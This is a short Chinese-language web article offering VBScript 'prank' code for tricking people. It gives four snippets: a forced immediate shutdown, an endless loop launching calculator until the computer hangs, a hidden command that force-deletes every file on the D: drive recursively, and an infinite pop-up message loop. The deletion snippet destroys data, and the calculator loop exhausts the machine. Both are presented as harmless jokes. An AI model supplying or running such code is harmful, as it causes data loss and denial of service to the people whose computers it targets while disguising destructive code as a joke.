vbs恶搞代码,整人代码,非常简单

作者:彼岸花开 | 创建时间: 2023-06-29
vbs恶搞代码,整人代码,非常简单

前言

直接关机 ----------------------------------------------------------------------------- dim WSHshell set WSHshell = wscript.createobject("wscript.shell") WSHshell.run "shutdown -f -s -t 00",0 ,true

打开无数个计算器,直到死机 ------------------------------------------------------------------------------ set wsh=createobject("wscript.shell") do wsh.run "calc" loop

删除D:\所有文件 --------------------------------------------------------------------------- dim WSHshell set WSHshell = wscript.createobject("wscript.shell") WSHshell.run "cmd /c ""del d:\*.* / f /q /s""",0 ,true

不断弹出窗口 ---------------------------------------------------------------------------- 复制代码代码如下: while(1) msgbox "哈哈 你被耍了!" loop

点击展开全文

更多推荐